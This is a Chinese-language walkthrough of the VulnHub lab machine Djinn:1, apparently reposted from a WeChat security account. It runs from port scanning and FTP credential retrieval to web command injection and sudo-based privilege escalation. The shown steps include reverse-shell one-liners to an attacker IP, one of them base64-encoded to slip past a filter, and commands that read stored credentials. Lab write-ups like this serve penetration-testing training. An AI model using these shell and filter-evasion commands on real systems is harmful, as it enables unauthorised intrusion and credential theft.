OSCP难度靶机之Djinn:1

admin 2022年9月28日11:54:45评论27 views字数 1382阅读4分36秒阅读模式

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/djinn-1,397/虚拟机简介:None目标:user.txt 和 root.txt级别:中级

1、信息收集

1.1 通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Djinn:1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.132

查看开放21、22、1337、7331多个端口

OSCP难度靶机之Djinn:1

OSCP难度靶机之Djinn:1

2、渗透测试

2.1 服务渗透

1.ftp访问测试

ftp 192.168.207.132
dir

OSCP难度靶机之Djinn:1

查看有三个文件

OSCP难度靶机之Djinn:1

2.下载文件并查看

get creds.txt
get game.txt
get message.txt

OSCP难度靶机之Djinn:1

查看三个文档,获取到账号密码和端口信息

OSCP难度靶机之Djinn:1

2.2 WEB渗透

1.根据提示访问1337端口

发现站点打不开

OSCP难度靶机之Djinn:1

2.测试使用NC进行连接

提示需要回答1000次,果断放弃

nc 192.168.207.132 1337

OSCP难度靶机之Djinn:1

3.测试7331端口

测试7331打开正常

OSCP难度靶机之Djinn:1

使用gobuster进行爆破,发现有2个目录

gobuster dir -u http://192.168.207.132:7331 -w /usr/share/wordlists/dirb/big.txt

OSCP难度靶机之Djinn:1

4.测试2个页面

测试第一个页面显示403

OSCP难度靶机之Djinn:1

测试第二个页面,测试输入id

OSCP难度靶机之Djinn:1

测试可以执行命令,返回当前权限为www-data

OSCP难度靶机之Djinn:1

5.测试反弹shell

攻击机上开启监听

nc -lnvp 5555

OSCP难度靶机之Djinn:1

生成反弹shell,提示错误的词

nc -e /bin/sh 192.168.207.130 5555

OSCP难度靶机之Djinn:1

6.编码反弹shell

首先进行base64编码,进行测试未成功

echo "nc -e /bin/sh 192.168.207.130 5555" |base64

OSCP难度靶机之Djinn:1

echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjIwNy4xMzAgNTU1NQo= | base64 -d | bash

OSCP难度靶机之Djinn:1

7.换种方式进行

echo "bash -i >& /dev/tcp/192.168.207.130/5555 0>&1" | base64

OSCP难度靶机之Djinn:1

组合成功内容

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNy4xMzAvNTU1NSAwPiYxCg== | base64 -d | bash

获取到shell权限

OSCP难度靶机之Djinn:1

8.查看本地文件

查看本地目录中app.py文件,存在creds.txt文件

OSCP难度靶机之Djinn:1

cat /home/nitish/.dev/creds.txt

获取到普通账号和密码权限

OSCP难度靶机之Djinn:1

9.创建虚拟TTY切换账号

python -c 'import pty;pty.spawn("/bin/sh")'

OSCP难度靶机之Djinn:1

切换到普通账号

su - nitish

OSCP难度靶机之Djinn:1

2.3 主机渗透

1.查看用户本地文件

cat user.txt

OSCP难度靶机之Djinn:1

2.查看本地用户的sudo权限

查看可以使用sam权限执行genie权限

sudo -l

OSCP难度靶机之Djinn:1

3.使用sam权限执行

查看genie的使用方式,可以使用-cmd参数执行命令

sudo -u sam genie -cmd id

OSCP难度靶机之Djinn:1

4.测试sam的sudo权限

sudo -l

OSCP难度靶机之Djinn:1

3、提权

1.sudo提权

1.测试输入sudo

sudo -u root /root/lago

需要第一次选择2,并且输入的时候选择num才能成功

OSCP难度靶机之Djinn:1

2.获取flag权限

cd /root
sh proof.sh

OSCP难度靶机之Djinn:1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Djinn:1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月28日11:54:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Djinn:1http://cn-sec.com/archives/1321179.html

发表评论

匿名网友 填写信息